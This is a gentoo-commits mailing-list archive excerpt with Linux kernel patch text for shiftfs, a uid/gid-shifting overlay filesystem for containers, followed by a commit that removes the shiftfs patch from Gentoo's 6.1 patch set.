++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
++	if (!ret)
++		ret = err;
++
++	return ret;
++}
++
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
++{
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
++	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, argp, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
++	return false;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		if (!in_ioctl_whitelist(cmd, arg) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		if (!in_ioctl_whitelist(cmd, arg) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct file *realfile = file->private_data;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_file_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_dir_llseek,
++	.read			= generic_read_dir,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
++	if (err)
++		return err;
++
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
++	/* Mark mount option cannot be changed. */
++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->passthrough_mark,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put_path;
++	}
++
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
++	sb->s_flags |= SB_POSIXACL;
++
++	if (sbinfo->mark) {
++		struct cred *cred_tmp;
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
++
++		/*
++		 * this part is visible unshifted, so make sure no
++		 * executables that could be used to give suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
++		/*
++		 * Handle nesting of shiftfs mounts by referring this mark
++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
++		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
++
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
++		dentry = dget(path.dentry->d_fsdata);
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
++	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
++
++	dentry = NULL;
++	err = 0;
++
++out_put_path:
++	path_put(&path);
++
++out_free_name:
++	kfree(name);
++
++	dput(dentry);
++
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+--- a/include/uapi/linux/magic.h	2023-03-06 11:56:37.299048477 -0500
++++ b/include/uapi/linux/magic.h	2023-03-06 11:57:37.466014822 -0500
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC   0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+--- a/fs/Makefile	2023-03-06 11:54:08.154952284 -0500
++++ b/fs/Makefile	2023-03-06 11:55:21.982000456 -0500
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)	+= shiftfs.o
+--- a/fs/Kconfig	2023-03-06 11:52:29.331094254 -0500
++++ b/fs/Kconfig	2023-03-06 11:52:43.127835240 -0500
+@@ -128,6 +128,24 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-03 13:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-03 13:01 UTC (permalink / raw
  To: gentoo-commits

commit:     0a06433fb4a1c7576591d46661bc9e1308d17e59
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 13:00:38 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 13:00:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0a06433f

Remove shiftfs until I fix the patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 -
 5000_shiftfs-6.1-2023-01-31.patch | 6554 -------------------------------------
 2 files changed, 6558 deletions(-)

diff --git a/0000_README b/0000_README
index 328fcd23..dca64867 100644
--- a/0000_README
+++ b/0000_README
@@ -147,10 +147,6 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
-Patch:  5000_shiftfs-6.1-2023-01-31.patch
-From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
-Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
-
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.1-2023-01-31.patch b/5000_shiftfs-6.1-2023-01-31.patch
deleted file mode 100644
index a5b40429..00000000
--- a/5000_shiftfs-6.1-2023-01-31.patch
+++ /dev/null
@@ -1,6554 +0,0 @@
-From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
-From: James Bottomley <James.Bottomley@HansenPartnership.com>
-Date: Thu, 4 Apr 2019 15:39:11 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-This allows any subtree to be uid/gid shifted and bound elsewhere.  It
-does this by operating simlarly to overlayfs.  Its primary use is for
-shifting the underlying uids of filesystems used to support
-unpriviliged (uid shifted) containers.  The usual use case here is
-that the container is operating with an uid shifted unprivileged root
-but sometimes needs to make use of or work with a filesystem image
-that has root at real uid 0.
-
-The mechanism is to allow any subordinate mount namespace to mount a
-shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
-it to mount marked subtrees (using the -o mark option as root).  Once
-mounted, the subtree is mapped via the super block user namespace so
-that the interior ids of the mounting user namespace are the ids
-written to the filesystem.
-
-Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
-[ saf: use designated initializers for path declarations to fix errors
-  with struct randomization ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-[update: port to 5.0]
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig                 |   8 +
- fs/Makefile                |   1 +
- fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
- include/uapi/linux/magic.h |   2 +
- 4 files changed, 791 insertions(+)
- create mode 100644 fs/shiftfs.c
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index 2685a4d0d353..b53bece1e940 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
- source "fs/fuse/Kconfig"
- source "fs/overlayfs/Kconfig"
- 
-+config SHIFT_FS
-+	tristate "UID/GID shifting overlay filesystem for containers"
-+	help
-+	  This filesystem can overlay any mounted filesystem and shift
-+	  the uid/gid the files appear at.  The idea is that
-+	  unprivileged containers can use this to mount root volumes
-+	  using this technique.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/Makefile b/fs/Makefile
-index 4dea17840761..628632dcb9b1 100644
---- a/fs/Makefile
-+++ b/fs/Makefile
-@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
- obj-$(CONFIG_EROFS_FS)		+= erofs/
- obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
- obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
-+obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-new file mode 100644
-index 000000000000..f7cada126daa
---- /dev/null
-+++ b/fs/shiftfs.c
-@@ -0,0 +1,780 @@
-+#include <linux/cred.h>
-+#include <linux/mount.h>
-+#include <linux/file.h>
-+#include <linux/fs.h>
-+#include <linux/namei.h>
-+#include <linux/module.h>
-+#include <linux/kernel.h>
-+#include <linux/magic.h>
-+#include <linux/parser.h>
-+#include <linux/seq_file.h>
-+#include <linux/statfs.h>
-+#include <linux/slab.h>
-+#include <linux/user_namespace.h>
-+#include <linux/uidgid.h>
-+#include <linux/xattr.h>
-+
-+struct shiftfs_super_info {
-+	struct vfsmount *mnt;
-+	struct user_namespace *userns;
-+	bool mark;
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry);
-+
-+enum {
-+	OPT_MARK,
-+	OPT_LAST,
-+};
-+
-+/* global filesystem options */
-+static const match_table_t tokens = {
-+	{ OPT_MARK, "mark" },
-+	{ OPT_LAST, NULL }
-+};
-+
-+static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct cred *cred = prepare_creds();
-+
-+	if (!cred)
-+		return NULL;
-+
-+	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
-+	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
-+	put_user_ns(cred->user_ns);
-+	cred->user_ns = get_user_ns(ssi->userns);
-+
-+	return cred;
-+}
-+
-+static const struct cred *shiftfs_new_creds(const struct cred **newcred,
-+					    struct super_block *sb)
-+{
-+	const struct cred *cred = shiftfs_get_up_creds(sb);
-+
-+	*newcred = cred;
-+
-+	if (cred)
-+		cred = override_creds(cred);
-+	else
-+		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+
-+	return cred;
-+}
-+
-+static void shiftfs_old_creds(const struct cred *oldcred,
-+			      const struct cred **newcred)
-+{
-+	if (!*newcred)
-+		return;
-+
-+	revert_creds(oldcred);
-+	put_cred(*newcred);
-+}
-+
-+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+{
-+	char *p;
-+	substring_t args[MAX_OPT_ARGS];
-+
-+	ssi->mark = false;
-+
-+	while ((p = strsep(&options, ",")) != NULL) {
-+		int token;
-+
-+		if (!*p)
-+			continue;
-+
-+		token = match_token(p, tokens, args);
-+		switch (token) {
-+		case OPT_MARK:
-+			ssi->mark = true;
-+			break;
-+		default:
-+			return -EINVAL;
-+		}
-+	}
-+	return 0;
-+}
-+
-+static void shiftfs_d_release(struct dentry *dentry)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	dput(real);
-+}
-+
-+static struct dentry *shiftfs_d_real(struct dentry *dentry,
-+				     const struct inode *inode)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (unlikely(real->d_flags & DCACHE_OP_REAL))
-+		return real->d_op->d_real(real, real->d_inode);
-+
-+	return real;
-+}
-+
-+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		return 1;
-+
-+	return real->d_op->d_weak_revalidate(real, flags);
-+}
-+
-+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int ret;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	/*
-+	 * inode state of underlying changed from positive to negative
-+	 * or vice versa; force a lookup to update our view
-+	 */
-+	if (d_is_negative(real) != d_is_negative(dentry))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
-+		return 1;
-+
-+	ret = real->d_op->d_revalidate(real, flags);
-+
-+	if (ret == 0 && !(flags & LOOKUP_RCU))
-+		d_invalidate(real);
-+
-+	return ret;
-+}
-+
-+static const struct dentry_operations shiftfs_dentry_ops = {
-+	.d_release	= shiftfs_d_release,
-+	.d_real		= shiftfs_d_real,
-+	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_weak_revalidate = shiftfs_d_weak_revalidate,
-+};
-+
-+static int shiftfs_readlink(struct dentry *dentry, char __user *data,
-+			    int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	const struct inode_operations *iop = real->d_inode->i_op;
-+
-+	if (iop->readlink)
-+		return iop->readlink(real, data, flags);
-+
-+	return -EINVAL;
-+}
-+
-+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
-+				    struct delayed_call *done)
-+{
-+	if (dentry) {
-+		struct dentry *real = dentry->d_fsdata;
-+		struct inode *reali = real->d_inode;
-+		const struct inode_operations *iop = reali->i_op;
-+		const char *res = ERR_PTR(-EPERM);
-+
-+		if (iop->get_link)
-+			res = iop->get_link(real, reali, done);
-+
-+		return res;
-+	} else {
-+		/* RCU lookup not supported */
-+		return ERR_PTR(-ECHILD);
-+	}
-+}
-+
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err = -EOPNOTSUPP;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
